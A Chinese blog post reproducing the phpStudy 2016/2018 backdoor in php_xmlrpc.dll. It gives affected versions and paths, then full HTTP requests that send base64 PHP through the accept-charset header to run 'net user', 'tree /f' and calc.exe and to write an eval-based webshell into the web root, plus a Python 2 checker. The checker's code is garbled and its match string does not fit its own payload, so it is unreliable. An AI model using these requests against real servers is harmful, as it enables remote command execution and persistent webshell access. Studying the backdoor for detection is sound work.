参考文章：https://blog.csdn.net/qq_38484285/article/details/101381883

感谢大佬分享！！

SSRF漏洞学习终于告一段落，很早就知道phpstudy爆出来有后门，爆出漏洞的过程好像还挺奇葩的，时间也不算很充裕，今天简单学习下。

影响版本

目前已知受影响的phpStudy版本

phpstudy 2016版php-5.4

phpstudy 2018版php-5.2.17

phpstudy 2018版php-5.4.45

后门位置

phpStudy2016和phpStudy2018自带php-5.2.17、php-5.4.45

后门隐藏在程序自带的php的php_xmlrpc.dll模块

在*:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext找到php_xmlrpc.dll

phpStudy2016路径

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

用notepad打开此文件查找@eval，文件存在@eval(%s(‘%s’))证明漏洞存在，如图：

说明：存在后门！！！！

要求

请求任意后缀为php的文件

存在Accept-Encoding: gzip,deflate

accept-charset: 这里就是你要执行的代码命令(经过base64加密)

漏洞复现

exp_net user

GET /index.php HTTP/1.1Host:192.168.31.182User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding:gzip,deflate

Connection: close

accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 //主要是这行 base64解码之后就是 echo system("net user");

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

远程命令执行成功，在响应中，可查看到电脑中的用户

exp_system('calc.exe')

GET /index.php HTTP/1.1Host:192.168.0.108User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding:gzip,deflate

Connection: close

accept-charset:c3lzdGVtKCdjYWxjLmV4ZScpOw // base64 解码之后 system('calc.exe'); calc.exe是计算器

Upgrade-Insecure-Requests: 1

exp_写一句话木马菜刀链接

GET /index.php HTTP/1.1Host:192.168.0.108User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding:gzip,deflate

Connection: close

accept-charset:c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=

//system('echo ^<?php @eval($_POST["shell"])?^>>PHPTutorial\WWW\shell.php');

Upgrade-Insecure-Requests: 1

可能遇到的问题

若无法成功连接，可能生成目录不对，执行命令tree /f查看文件树，找到可访问路径生成shell

GET /phpinfo.php HTTP/1.1Host:192.168.0.108User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Sec-Fetch-Site: none,

accept-charset: c3lzdGVtKCd0cmVlIC9mJyk7

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN,zh;q=0.9

2.复现漏洞的过程中，我自己遇到一个问题，请求包放到repeater时，会加入很多的空格。

Accept-Encoding: gzip, deflate

在Accept-Encoding中，deflate的前面都有一个空格，这个空格导致重访无法成功,去掉空格即可。

漏洞检测脚本(python2)

import urllib2

import sys

import zlib

headers={"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3","User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36","content-type": "text/xml","Connection": "close","Accept-Language":"zh-CN,zh;q=0.9","Accept-Charset":"ZWNobyAnYmFja2Rvb3InOw==","Accept-Encoding":"gzip,deflate","Upgrade-Insecure-Requests":"1",

}

def check(target):

GetTarget= urllib2.Request(url=target,headers=headers)

response=urllib2.urlopen(GetTarget)

result=response.read()if response.info().get('Content-Encoding') == 'gzip':

result= zlib.decompress(result, 16+zlib.MAX_WBITS)if 'phpstudy backdoor' inresult:

print('{0} {1}'.format(target,'存在后门'))else:

print('{0} {1}'.format(target,'不存在后门'))if __name__ == '__main__':

print'PHPStudy 后门检测工具'print'正在检测', sys.argv[1]

check(sys.argv[1])

注意啊，这是python2的环境，现在urllib2库现在没有了！！！！